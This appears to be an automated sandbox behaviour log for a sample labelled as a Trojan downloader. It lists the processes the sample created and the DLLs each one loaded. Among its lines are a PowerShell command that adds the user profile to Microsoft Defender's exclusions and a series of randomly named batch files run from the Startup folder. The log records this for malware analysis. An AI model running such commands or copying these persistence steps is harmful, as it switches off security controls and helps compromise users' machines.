Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" "
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
